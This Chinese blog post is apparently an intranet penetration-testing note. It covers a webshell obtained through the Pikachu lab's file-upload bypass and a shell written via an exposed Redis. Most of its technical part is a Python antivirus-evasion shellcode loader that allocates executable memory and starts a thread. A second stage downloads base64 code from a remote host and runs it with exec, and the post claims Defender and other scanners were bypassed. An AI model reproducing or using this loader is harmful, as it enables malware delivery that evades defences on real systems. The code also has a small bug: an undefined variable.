起因:同事A扫公司内网,发现某同事,6379端口开放---redis
看了看80端口也开放,还在玩pikachu
经过同意开始我的测试,找到pikachu中的文件上传靶场---上传前端js校验禁掉直接上shell连接
随便翻了翻几个盘发现这个C++目录有个1.exe2023年3月16日上传的,看来被已经被搞了好久了,还没发现
还是做了简单免杀了还是4/70
python制作简单免杀
1.生成payload
2.加载payload
import ctypes
#生成的payload
shellcode=b'payload'
#加载shellcode
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
3.base64加密第二步骤中的代码
4.把base64加密后的代码上传到某个站点
利用get请求去访问站点中的那个文件读取文件通过exec加载文件
import requests,base64
#请求站点
s=requests.get("https://xx.com/payload.txt").text
#base64解密
sc=base64.b64decode(ok)
exec执行
exec(sc)
5.之前virustotal试过是6/70, Defender,360,火绒静态全过
缺点:pyinstaller, py2exe两个打包器经过测试,随便写点东西打包,在virustotal中都报毒,还有就是打包后的文件体积较大
内网渗透
接下来就是各种信息收集提权,写面杀的原因就是他安装了Defender
搞的起劲过弄完面杀还没打包发现shell被删了,但是redis还可连接。通过redis-cli.exe写shell,连接成功
接下来就是上免杀马,后续操作....
标签:kernel32,内网,base64,端口,笔记,ctypes,windll,shellcode,payload From: https://blog.51cto.com/u_14881360/7443844